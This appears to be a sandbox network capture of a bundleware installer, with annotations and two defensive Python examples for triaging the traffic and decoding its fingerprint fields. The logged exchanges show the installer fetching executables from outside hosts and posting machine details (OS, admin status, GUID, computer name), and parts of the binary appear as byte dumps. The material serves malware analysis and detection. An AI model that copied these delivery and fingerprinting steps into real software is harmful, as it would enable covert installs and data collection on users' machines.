X-Target-FN: Setup__2140_il65.exe
Content-Length: 784080
Connection: Close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........|i:...i...i
...im..i...im..i...im..i...i...i...i.e.i...i.e.i...i...i...i...i...i..
.i...i...i...i...i...iRich...i................PE..L.....4W............
.....h...r.......t............@..........................0.......y....
@..................................G..(........@......................
.$...................................2..@...............<..........
..................text....f.......h.................. ..`.rdata.......
........l..............@[email protected].......<..............@...
[email protected]..............@[email protected]............
[email protected]............................................................
......................................................................
......................................................................
......................................................................
......................................................................
..............vC............................U...E.]...................
......................................VW..W..j.V..|.......>_^......
...U...E....E..A...]...............U...Q.V.u...........^]..........U..
.U..M..........3......]......U..Q.E.V.p....0.u........^Y]....U...u..E.
....t..u........]...2.]................U..Q.E.V.p....0.u........^Y]...
.U..Q.u..$.....t..u....u......Y]...2.Y]..........V...h.....^.....V...(
.....^.....3..........u....w.....&.........j.j.j.h........B.......

<<< skipped >>>
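For detection, the useful part of this exchange is not any single indicator but its shape: an HTTP/1.0 request under a downloader user agent (NSISDL/1.2 (Mozilla) here, InstallCapital for the other stub) to a bare IP for the manifest, then an executable served by a PHP endpoint with Content-Type application/x-msdownload, an attachment filename ending in .exe, no-store caching and an MZ header at the top of the body. The block below is an added example, not part of the report: it encodes those traits as rules and runs them over constructed request/response records. The first two records are modelled on the launch_v2.php and download.php exchanges above; the other two (hosts under example.net and example.com) are invented to exercise the content-type mismatch rule and to give a benign baseline. Rule names and the two-rule threshold are my own choices.

```python
"""Added example, not part of the report: rule-based triage of HTTP
request/response pairs using the traits visible in the capture above
(downloader user agents, a bare-IP host, an .exe attachment served by a
PHP endpoint, an MZ header in the body).

RECORDS are constructed for this example: the first two are modelled on
the launch_v2.php and download.php exchanges, the third and fourth are
invented (example.net / example.com hosts) to exercise the mismatch rule
and provide a benign baseline.  Rule names and the threshold are mine.
"""
import ipaddress
import re

DOWNLOADER_UA = re.compile(r"^(NSISDL/|InstallCapital)")
EXE_ATTACHMENT = re.compile(r'filename="?[^";]*\.exe"?', re.IGNORECASE)
EXE_TYPES = {"application/x-msdownload", "application/x-msdos-program",
             "application/octet-stream"}

RECORDS = [
    {"name": "stage2-manifest",
     "request": {"version": "HTTP/1.0", "host": "46.21.100.248",
                 "path": "/launch_v2.php?p=sevenzip&pid=145&tid=438526&sid=7",
                 "user-agent": "NSISDL/1.2 (Mozilla)"},
     "response": {"content-type": "text/html; charset=UTF-8"},
     "body": b"files=3\nt1=dl\n"},
    {"name": "stage2-payload",
     "request": {"version": "HTTP/1.0", "host": "www.dosecuretrips.com",
                 "path": "/download.php?version=1.1.5.26&monitor=1&ci=2140",
                 "user-agent": "NSISDL/1.2 (Mozilla)"},
     "response": {"content-type": "application/x-msdownload",
                  "content-disposition": 'attachment; filename="Setup__2140_il65.exe"',
                  "cache-control": "no-store, no-cache, must-revalidate"},
     "body": b"MZ\x90\x00\x03\x00\x00\x00"},
    {"name": "mislabelled-binary",  # invented record
     "request": {"version": "HTTP/1.1", "host": "cdn.example.net",
                 "path": "/installer.php?affId=1006", "user-agent": "InstallCapital"},
     "response": {"content-type": "text/html"},
     "body": b"MZ\x90\x00"},
    {"name": "benign-update-check",  # invented record
     "request": {"version": "HTTP/1.1", "host": "updates.example.com",
                 "path": "/api/v1/version",
                 "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:45.0) Gecko/20100101 Firefox/45.0"},
     "response": {"content-type": "application/json"},
     "body": b'{"latest":"1.2.3"}'},
]


def is_ip_literal(host):
    """True when the Host header is a bare IPv4 address (host or host:port)."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def content_type_base(resp):
    """Media type without parameters, lower-cased."""
    return resp.get("content-type", "").split(";")[0].strip().lower()


def triage(rec):
    """Return the names of every rule that fires for one request/response pair."""
    req, resp, body = rec["request"], rec["response"], rec["body"]
    hits = []
    if DOWNLOADER_UA.match(req.get("user-agent", "")):
        hits.append("downloader-user-agent")
    if is_ip_literal(req.get("host", "")):
        hits.append("host-is-ip-literal")
    ctype = content_type_base(resp)
    exe_name = bool(EXE_ATTACHMENT.search(resp.get("content-disposition", "")))
    pe_body = body.startswith(b"MZ")
    if exe_name:
        hits.append("exe-attachment")
    if ctype in EXE_TYPES:
        hits.append("executable-content-type")
    if pe_body:
        hits.append("pe-header-in-body")
        # a PE delivered under a text/image/JSON label is hiding, not serving
        if ctype.startswith(("text/", "image/")) or ctype == "application/json":
            hits.append("content-type-mismatch")
    script_path = req.get("path", "").split("?", 1)[0].lower().endswith(".php")
    if (exe_name or pe_body) and script_path:
        hits.append("script-served-executable")
    return hits


def is_suspicious(rec, threshold=2):
    """Two or more independent traits is the (arbitrary) cut-off used here."""
    return len(triage(rec)) >= threshold


def triage_all(records=RECORDS):
    """Map record name to the rules that fired, in rule order."""
    return {r["name"]: triage(r) for r in records}


if __name__ == "__main__":
    for name, hits in triage_all().items():
        print("%-22s %s" % (name, ", ".join(hits) or "-"))
```

The manifest fetch fires only two rules, and neither is conclusive on its own; the point of scoring rather than alerting on single traits is that a bare-IP fetch under NSISDL/ is ordinary for some legitimate NSIS installers, while the same UA followed by a script-served PE is not.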

POST hXXp://set.downor3.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: set.downor3.space
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

cid=707569c4c57c87d53171d83f71777ffd&uac=1
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 12 May 2016 21:58:16 GMT
Connection: close
Content-Length: 428584
...no)9.VB.!.A0....z6.Y...4..S.W..Q2....d.P.f.<.......2.....#.....4
..).wHh./P.<\4_..../C.?..P.....D..o....}..VO............%.#X..=q..N
.c..N.}...pI..H.y.hz!v.R..g..D..V.q.~..Evq.......k..Y....v.....*].....
.q..t........<D12=..<.C5..Li].5.=I....oj..)..M&..........G..d...
..b...Y39....!P..?..V..WP.NNG...'..vD...gi....k........1.`.L.[...eQ.g.
"."".......w.....E9..$..F.Di.....C...Nj.&..U..n......u# ..y...~..rLX..
..#.FKg..N..|.... 8.vKs...3....-.C..DYW.1G.}bdOV...T..R%....MzO....`..
..!?...._E.Z.^7..!...(.Q'z'..1.`..%.....f...49..|.IB4..K.Vz...Gs.Cd.].
...Wm3!..i.K......\.....}).......,.:.5Wt....I...^4.....O..E"...A.#.|fp
.^.(}....|0....0.!k.E...E.o..L.Y..9....'h4....6...p0....S....{.w{.K..v
..8Z....L......'R....P.'.1.&..e.sY^.d..^F>(3...BXG..U...)s{..H...&l
t;A..~........0c.2..L.gd...h.....a....8)'..........d....[.......].....
]....z..C.D...?.z^..$..$..z.5..<.. .Yq.~/..g...o..*.5'&....f....,c.
..k..... ....wA....L.k.......:...HK$]..9....*"..$,.}...An....-........
[email protected](...}.".Ds9s..2.....D..d#...y...o....-..K..~n.oW%..}C.\4.'
tH.@!....k.....>....B;3y.v..e},w6.......G.n......t...j^.90..6......
H>[email protected].%.o.(.zz.V..../r.a..Q....!5P 8..'...I .I...%.*..AB...#
Q.QPH....JP.E.q]$..4.08...4..XN...s..U...C.........'.....b'....:H....K
..&.-A&.{......B..L..P..R./.3p...........'.5..UU.F........=.Mv...98...
S):...|7... jG.j.c.{o...&.A.....W..4.]......q!m..tw..rx../..1..6).D.2#
c..zN.!....q..cz./......f;....]...........k....q.....[.(<..<.a .
<H..s...UHx!B./.$..A..hM.|[email protected]..>._...o.e...U.

<<< skipped >>>

GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 12 May 2016 21:58:37 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02024-102524c8b7d471e3251121f5c3cd0e-1006-4-0-0-0-0-UA-0-3131-313435-343338353236-30-30-30-194.242.96.218-20160512175837-_-1D1F4F24103E253220292314513A1B00655F6F0B4F131541634A1F5117051454457459536E2E2C1807; expires=Sat, 11 Jun 2016 21:58:37 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Sun, 07 Apr 2019 08:38:37 GMT; path=/;
tracking_id: 102524c8b7d471e3251121f5c3cd0e
X-Robots-Tag: noindex, nofollow
Content-Length: 445
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="hXXp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a>.</p>
</body></html>

<<< skipped >>>

POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.secularistsarakolet.site
Content-Length: 430
Connection: Keep-Alive
Cache-Control: no-cache

Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=C8318CA6891F5119A9FD96EC19E98D71&Sysid1=C8318CA6891F5119A9FD96EC19E98D71&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&cmdl=Setup__2140_il65.exe&dprod=19C2FB3DEC385401F6FCF22178334A&exe=Setup__2140_il65&ffver=&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFA3AA==&netfs=3&ts=1463090333&ver=1.1.5.26
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2016 21:58:46 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
1b79
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
 <head>
 <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
 <title>DownloadManagerModern</title>
<script type="text/javascript">
 var g_notCompatibleWithUpdaterComps = ['LootFindKP'];
 var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba', 'UCwebAccelerator', 'UltimateSecurityPackage' , 'TotalSecurity', 'TotalSecurityIN', 'TotalSecurityRU'];
</script>
 <base href="hXXp://VVV.secularistsarakolet.site:80/index.php" />
<link rel="stylesheet" type="text/css" href="hXXp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" />
 <script type="text/javascript" src="hXXp://cdn1.downloadcrest.com/V35/amipb.js"></script>
 <script type="text/javascript">
var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer.png";
var g_r_appname="installer";
var g_r_cmdline="\/S";
var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_additional_offer_list = '1';
 var g_finish_install_button = '1';
 var g_popup_install_all = '1';
 var g_eula = 'VGhlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZpbGUgaXMgcnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcgdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3RoZX

<<< skipped >>>

POST /finalize.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.secularistsarakolet.site
Content-Length: 334
Connection: Keep-Alive
Cache-Control: no-cache

_hdn=0&_ver=1.1.5.26&_p=1&_s=20&_cc=UA&_cid=2140&_psb=0&_cnt=8090dd4d0f36f257c0d595bbfe802c92&_instid=l65&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_DownloadManagerModern=0&r_NationZoom=1&r_JinshanDuba=3&r_SputnikSearch=2&r_YesSearches=1&DownloadManagerModern=3&NationZoom=1&JinshanDuba=1&SputnikSearch=1&YesSearches=4
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Thu, 12 May 2016 21:58:48 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 4590
Connection: keep-alive
....<Array><page><f>1</f><fb>9</fb><pt>0</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps>DownloadManagerModern</comps><short_name>DownloadManagerModern</short_name><must_show>0</must_show><bdy>CjxkaXYgaWQ9ImFtaV9kX21hbmFnZXJfYm9keSI+Cgk8ZGl2IGlkPSJhbWlfbGVmdF9pbWFnZSI+CQoJCTxpbWcgaWQ9ImFtaV9pbWFnZXVybCIgc3JjPSJodHRwOi8vcGUtc2l4aS5jb20vaW1nL2ljb25faW5zdGFsbGVyLnBuZyIgLz4KCQk8ZGl2IGlkPSJhbWlfbGVmdF9saW5rcyI+CQoJCQk8YSBocmVmPSJodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS9wcml2YWN5Lmh0bWwgIiB0YXJnZXQ9Il9ibGFuayIgc3R5bGU9ImNvbG9yOiB3aGl0ZSI+UHJpdmFjeSBQb2xpY3k8L2E+PGJyIC8+CgkJCTxhIGhyZWY9Imh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL2luZGV4Lmh0bWwiIHRhcmdldD0iX2JsYW5rIiBzdHlsZT0iY29sb3I6IHdoaXRlIj5IZWxwPC9hPjxiciAvPgoJCQk8YSBocmVmPSJodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS9jb250YWN0LXVzLmh0bWwiIHRhcmdldD0iX2JsYW5rIiBzdHlsZT0iY29sb3I6IHdoaXRlIj5Db250YWN0IHVzPC9hPgoJCTwvZGl2PgoJPC9kaXY+Cgk8ZGl2IGlkPSJhbWlfYm9keV90ZXh0Ij4KCQk8ZGl2IGlkPSJhbWlfZGVjX2RpdiI+CgkJCTxzcGFuIGlkPSJhbWlfZGVjX3RpdGxlIj5TZXR1cCA8Yj5pbnN0YWxsZXI8L2I+PC9zcGFuPgkJCgkJCTxzcGFuIGlkPSJhbWlfZGVjX25vdGUiPlRvIGNvbnRpbnVlIGluc3RhbGxpbmcgeW91ciBhcHBsaWNhdGlvbiwgY2xpY2sgb24gdGhlIE5leHQgYnV0dG9uLjwvc3Bhbj4KCQk8L2Rpdj4KCQkJCQoJCTxkaXYgaWQ9ImRfYW1pX0Rvd25sb2FkTWFuYWdlck1vZGVybiIgc3R5bGU9ImhlaWdodDogMTMwcHgiPiAKCQk8YnIgLz4KCQkJPGRpdiBkYXRhLWFkanVzdC1oZWlnaHQ9IjAiIGlkPSJtaWRkbGUiIHN0eWxlPSJ3aWR0aDogMTAwJTsgcGFkZGluZzogMHB4OyBoZWlnaHQ6IDExMHB4OyBtYXJnaW4tdG9wOiA

<<< skipped >>>
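Two things in the exchanges above are worth decoding by hand. The POST to /index.php is the host fingerprint the dropped installer sends (Windows and .NET versions, an admin flag, the browser, a Sysid hash, and three base64 fields: mac, machg and name). The page also carries other base64 strings: the ho_mob cookie set by capital.go2cloud.org, the g_eula string in the index.php page, and the bdy element of the finalize.php XML. The block below is an added example, not code from the report or the installer; its inputs are copied from the capture. The decoder is lenient on purpose, because this page's rendering turned every '+' into a space (visible in the loop counters of amipb.js and in the '02:00' timezone offsets of the PNG metadata) and cut the longer blobs off mid-stream. The reading of the decoded values as a machine GUID and a computer name is mine, not something the page states.

```python
"""Added example (not from the report or the installer): decode the
/index.php fingerprint POST and the base64 blobs scattered through the
capture (ho_mob cookie, g_eula, <bdy>).  Inputs are copied from the page.
The labels 'machine GUID' and 'computer name' for machg and name are my
reading of the decoded values; the page does not document the fields.
"""
import base64
import binascii
import json
from urllib.parse import parse_qsl

POST_BODY = (
    "Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv="
    "&Sysid=C8318CA6891F5119A9FD96EC19E98D71&Sysid1=C8318CA6891F5119A9FD96EC19E98D71"
    "&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&cmdl=Setup__2140_il65.exe"
    "&dprod=19C2FB3DEC385401F6FCF22178334A&exe=Setup__2140_il65&ffver=&lang_DfltUser=0409"
    "&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA=="
    "&name=WFA3AA==&netfs=3&ts=1463090333&ver=1.1.5.26"
)

# fields whose values are base64 of a NUL-terminated string (assumed from the values)
BASE64_FIELDS = ("mac", "machg", "name")

# Other blobs from the capture.  The page's rendering turned '+' into ' '
# and truncated g_eula and <bdy>; the prefixes below are cut at a 4-character
# boundary where the text allows it, and the decoder pads in any case.
HO_MOB_COOKIE = ("eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJj"
                 "b25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=")
G_EULA_PREFIX = ("VGhlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZpbGUgaXMg"
                 "cnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4K")
BDY_PREFIX = ("CjxkaXYgaWQ9ImFtaV9kX21hbmFnZ"
              "XJfYm9keSI Cgk8ZGl2IGlkPSJhbWlfbGVmdF9pbWFnZSI CQoJCTxpbWcgaWQ9ImFtaV9")


def b64_lenient(text):
    """Decode base64 that may have had '+' turned into a space and lost its
    '=' padding to truncation.  Returns None if it still is not base64."""
    s = text.replace(" ", "+").replace("\r", "").replace("\n", "")
    s += "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def decode_fingerprint(body):
    """Split the form body; base64 fields are decoded and NUL-stripped,
    everything else is returned as sent."""
    out = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key in BASE64_FIELDS:
            raw = b64_lenient(value)
            out[key] = raw.rstrip(b"\x00").decode("ascii", "replace") if raw is not None else value
        else:
            out[key] = value
    return out


def decode_blobs():
    """The other base64 strings: the cookie as JSON, the EULA and page body as text."""
    return {
        "ho_mob": json.loads(b64_lenient(HO_MOB_COOKIE)),
        "g_eula": b64_lenient(G_EULA_PREFIX).decode("utf-8"),
        "bdy": b64_lenient(BDY_PREFIX).decode("utf-8", "replace"),
    }


if __name__ == "__main__":
    fp = decode_fingerprint(POST_BODY)
    for key in ("OSversion", "admin", "X64", "browser", "cmdl", "machg", "name", "ts"):
        print("%-10s %s" % (key, fp[key]))
    blobs = decode_blobs()
    print("ho_mob:", blobs["ho_mob"])
    print("g_eula:", blobs["g_eula"].strip())
    print("bdy:", repr(blobs["bdy"][:60]))
```

machg decodes to a GUID-shaped string and name to a short hostname-shaped one, each NUL-terminated, which is consistent with values read straight out of Windows APIs and encoded without trimming. The mac field is a single NUL here, so the sample either failed to read an adapter address or the sandbox had none to report; the decoder returns an empty string rather than guessing.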

GET /Html/7d0e2798-c9e5-442a-a48d-1a3dfc747868/logo.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.secularistsarakolet.site
Connection: Keep-Alive


HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
Date: Thu, 12 May 2016 21:58:48 GMT
ETag: "24c41-7262-5328b8d5eeccc"
Last-Modified: Wed, 11 May 2016 06:57:17 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Length: 29282
Connection: keep-alive
.PNG........IHDR.......s.....`..1....pHYs...............9.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.155772, 2014/01/13-19:44:00 ">
 <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about=""
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
 xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
 xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
 xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
 xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
 xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
 xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
 <xmp:CreatorTool>Adobe Photoshop CC 2014 (Windows)</xmp:CreatorTool>
 <xmp:CreateDate>2016-03-16T16:09:11+02:00</xmp:CreateDate>
 <xmp:ModifyDate>2016-03-16T16:23:05+02:00</xmp:ModifyDate>
 <xmp:MetadataDate>2016-03-16T16:23:05+02:00</xmp:MetadataDate>
 <dc:format>image/png</dc:format>
 <photoshop:ColorMode>3</photoshop:ColorMode>
 <xmpMM:InstanceID>xmp.iid:36122a74-ac0f-5d40-8bf0-cb214281bd07</xmpMM:InstanceID>
 <xmpMM:DocumentID>adobe:docid:photoshop:1f386400-eb82-11e5-9c68-b3c1a0aff854</xmpMM:DocumentID>
 <xmpMM:OriginalDocumentID>xmp.did:ff769801-1319-ee4c

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2881
Connection: keep-alive
Date: Sat, 12 Mar 2016 07:10:54 GMT
Content-Disposition: attachment; filename="cancel1.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "d9f00c86bfa3e08e905128b131229fac"
Accept-Ranges: bytes
Server: AmazonS3
Age: 23503
X-Cache: Hit from cloudfront
Via: 1.1 16a8156bb9e085b1e79a6bf5cb89d49e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: GwTgHFdoISZkzBjhmS03rIHfHoS0eB17BdfxNcYAUGhPfPV-QSjtRg==
[email protected]*.-<.AC.K=.F>.H'. ;.B,./=.E)./)[email protected]=.D=.D?.GC.M
>.DC.IC.K'.,@.H>.F:.A*./D.LC.M?.HB.L=.G;.A9.@:.C .-;.CuuuB.K(.)&
gt;.G)..<.C). @.I>.E...>.G,. ). &. <.E*.&%.*6.C-.3-.33.7).
1&.)www(.-*. .../.54.?-.4=.B...!.().0...-.7...G.I..9-.35.7?.F'.0A.O-..
,.5<.B>.J ..D.I5.:..5=.GE.K/.0-.-/.2?.=,.7*. ;.B/.4 .'C.I..79.B&
.2 .,<.>".*-.0?.C-.-8.>-.&'.12.4:.AC.B1.7-.4..$'. 3.8Q.\<.
A<.G4.9 .05.<C.F6.;;[email protected]".%;.B>.Q*.-0.5&.<9.?'.-#.) .6:.A
./..31.57.>4.96.>0.76.<&.)2.78.?-.2-.3ppp...................
......................................................................
......................................................................
......................................................................
......................................................................
.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 ">
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:5653313B52CD11E48302D8AFAF09E831" xmpMM:DocumentID="xmp.did:5653313C52CD11E48302D8AFAF09E831">
<xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5653313952CD11E48302D8AFAF

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1293
Connection: keep-alive
Date: Sat, 12 Mar 2016 07:10:55 GMT
Content-Disposition: attachment; filename="decline.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "137a96f0655570ffdf65ae14dad52404"
Accept-Ranges: bytes
Server: AmazonS3
Age: 33966
X-Cache: Hit from cloudfront
Via: 1.1 16a8156bb9e085b1e79a6bf5cb89d49e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: KuEvsOr3zBFpfWbfx-6VzBKR_uzo9NBxRIjFUr0s1IAudC0z46Sm4Q==

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2157
Connection: keep-alive
Date: Sat, 12 Dec 2015 03:13:59 GMT
Content-Disposition: attachment; filename="next.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"
Accept-Ranges: bytes
Server: AmazonS3
Age: 21980
X-Cache: Hit from cloudfront
Via: 1.1 16a8156bb9e085b1e79a6bf5cb89d49e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: _pf7A1s5gUmMDTPqgxT_w007CC28IttnXMmir4pleetmsCZdbVeFng==

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2157
Connection: keep-alive
Date: Sat, 12 Mar 2016 07:10:57 GMT
Content-Disposition: attachment; filename="finish.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"
Accept-Ranges: bytes
Server: AmazonS3
Age: 21979
X-Cache: Hit from cloudfront
Via: 1.1 16a8156bb9e085b1e79a6bf5cb89d49e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: DAYyOWr_G-eK7FsfLGsyvCBPLTI84olBSQY9JY4CB0kMa7bSXwlBUg==

<<< skipped >>>

